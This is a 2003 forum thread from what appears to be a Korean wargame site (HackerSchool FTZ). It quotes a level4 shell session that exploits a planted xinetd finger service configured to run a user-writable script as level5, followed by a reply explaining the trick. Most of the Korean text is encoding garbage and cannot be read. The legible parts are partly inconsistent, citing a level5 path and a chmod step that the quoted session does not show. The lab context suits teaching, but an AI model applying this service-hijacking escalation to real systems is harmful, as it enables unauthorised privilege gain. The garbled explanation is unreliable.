http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=654 [º¹»ç]
>[level4@ftz level4]$ cat hint
>
>
>´©±º°¡ /etc/xinetd.d/¿¡ ¹éµµ¾î¸¦ ½É¾î³õ¾Ò´Ù.!
>
>
>[level4@ftz level4]$ cd /etc/xinetd.d
>[level4@ftz xinetd.d]$ ls -al
>total 60
>drwxr-xr-x 2 root root 4096 Aug 5 23:50 .
>drwxr-xr-x 51 root root 4096 Oct 24 08:46 ..
>-rw-r--r-- 1 root root 171 Mar 28 2003 backdoor
>-rw-r--r-- 1 root root 295 Mar 28 2003 chargen
>-rw-r--r-- 1 root root 315 Mar 28 2003 chargen-udp
>-rw-r--r-- 1 root root 295 Mar 28 2003 daytime
>-rw-r--r-- 1 root root 315 Mar 28 2003 daytime-udp
>-rw-r--r-- 1 root root 287 Mar 28 2003 echo
>-rw-r--r-- 1 root root 306 Mar 28 2003 echo-udp
>-rw-r--r-- 1 root root 312 Mar 28 2003 servers
>-rw-r--r-- 1 root root 310 Mar 28 2003 services
>-rw-r--r-- 1 root root 406 Mar 28 2003 sgi_fam
>-rw-r--r-- 1 root root 302 Mar 28 2003 telnet
>-rw-r--r-- 1 root root 319 Mar 28 2003 time
>-rw-r--r-- 1 root root 315 Mar 28 2003 time-udp
>[level4@ftz xinetd.d]$ cat backdoor
>service finger
>{
> disable = no
> flags = REUSE
> socket_type = stream
> wait = no
> user = level5
> server = /home/level4/tmp/backdoor
> log_on_failure += USERID
>}
>[level4@ftz xinetd.d]$ cd /home/level4/tmp
>[level4@ftz tmp]$ ls -al
>total 8
>drwxrwxr-x 2 root level4 4096 Oct 27 19:20 .
>drwxr-xr-x 4 root level4 4096 May 7 2002 ..
>[level4@ftz tmp]$ vi backdoor
>#!/bin/bash
>my-pass
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>:wq
>"backdoor" [New] 2L, 20C written
>[level4@ftz tmp]$ ls -al
>total 12
>drwxrwxr-x 2 root level4 4096 Oct 27 19:41 .
>drwxr-xr-x 4 root level4 4096 May 7 2002 ..
>-rw-rw-r-- 1 level4 level4 20 Oct 27 19:41 backdoor
>[level4@ftz tmp]$ finger level5@localhost
>Broken pipe
>[level4@ftz tmp]$
>
>------------------------------------------------------------
>
>ÀÌ°Ç 밎¿¡ ¾î¶²ºÐÀÌ ¾²½Å±ÛÁÙ ÀϺκÐÀÔ´Ï´Ù.
>
>À̰ɺ¸°í ´ëÃæµû¶óÇϴϱî. ·¹º§5Æнº¿öµå°¡ º¸ÀÌ´õ±º¿ä..
>
>±Ùµ¥ »ý°¢À»ÇغÁµµ ¾î¶±ÄÉÇؼ Æнº¿öµå¸¦ ¾ò¾î³Á´ÂÁö..ÀÌÇØ°¡¾È°©´Ï´Ù.
>
>¾î¶²¿ø¸®Àΰ¡¿ä~?
>
>±Ã±ÝÇعÌÄ¡°Ù¾î¿ä..TT
>
´ÔÀÇ ±ÛÀÇ ³»¿ëÁß
service finger
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = level5
server = /home/level4/tmp/backdoor
log_on_failure += USERID
}
ÀÌ·¸°Ô ÀÖ½À´Ï´Ù,
ÀÌ°Ô ¹éµµ¾î ¼³Á¤ ÆÄÀÏÀ̶ó°í º¸½Ã¸é µË´Ï´Ù
Àú±â À§¿¡ º¸¸é fingerÆ÷Æ®¸¦ »ç¿ëÇϴ°ÍÀ» ¾Ë¼ö ÀÖ½À´Ï´Ù
´Ù¸¥°Ç ¸ô¶óµµ µÇ°í ÀÚ¼¼È÷ º¸¸é
user ¶õ¿¡´Â level5 sever ¶õ¿¡´Â /home/level4/tmp/backdoor
±×¸®±¸ log_on_failure ¿¡´Â USERID ¶ó°í ½áÀÖ½À´Ï´Ù
¶æÀ» Çؼ®Çغ¸ÀÚ¸é fingerÆ÷Æ®·Î Á¢¼ÓÇÏ¸é ·Î±×ÀΰúÁ¤ ¾øÀÌ level5¶ó´Â ±ÇÇÑÀÌ ÁÖ¾îÁøÈÄ /home/level5/tmp/backdoor ¶ó´Â ÇÁ·Î±×·¥À» ½ÇÇàÇÕ´Ï´Ù,
±×·¡¼ cd /home/level5/tmp/·Î °£´ÙÀ½¿¡ backdoor¶ó´Â ÇÁ·Î±×·¥À» ÀÛ¼ºÇÑ°ÍÀÔ´Ï´Ù
ÀÌ backdoor´Â ½©½ºÅ©¸³Æ®·Î ÀÛ¼ºµÇ¾îÀÖ±¸ ½©½ºÅ©¸³Æ®´Â Ç×»ó
#!/bin/bash ·Î ½ÃÀÛÇÕ´Ï´Ù
³»¿ëÀ»º¸¸é my-passÀΰɺ¸¾Æ ºñ¹øÀ» Ãâ·ÂÇØÁÖ´Â ÇÁ·Î±×·¥À̶ó´Â ¾Ë¼ö ÀÖ½À´Ï´Ù,
±×¸®±¸ ÇÁ·Î±×·¥À» ¸¸µçÈÄ chomd·Î ´Ù¸¥»ç¶÷¿¡°Ôµµ ½ÇÇà±ÇÇÑÀ» ÁÖ¾î¾ß ÇÕ´Ï´Ù
¿Ö³ÄÇϸé backdoor¶ó´Â ÇÁ·Î±×·¥Àº ³ª(level4)°¡ ÀÛ¼ºÇÏÁö¸¸ ÇÁ·Î±×·¥À» ½ÇÇàÇÏ´Â finger´Â level5ÀÇ ±ÇÇÑÀ¸·Î ÀÛµ¿Çϱ⠶§¹®ÀÔ´Ï´Ù
±×¸®±¸ fingerÀÇ »ç¿ë¹ýÀº finger À¯Àú³×ÀÓ@¾ÆÀÌÇÇÁÖ¼Ò ÀÔ´Ï´Ù
±Ùµ¥ localhost´Â ÀÚ±âÀÚ½ÅÀ» °¡¸£Å°´Â ¾ÆÀÌÇÇ·Î ÇØÄ¿½ºÄð¿¡¼ fingerµµ µ¹¸®°í ¹Þ°í Çϱ⶧¹®¿¡ ÀÚ±âÀÚ½ÅÀ» °¡¸£Å°´Â localhost¶ó°í ÃľßÇÕ´Ï´Ù,
¹°·Ð ftzÀÇ ¾ÆÀÌÇÇÁÖ¼Ò³ª, ftz.hackerschool.org¶ó°í Ãĵµ µË´Ï´Ù
|
Hit : 3984 Date : 2003/11/22 06:58
|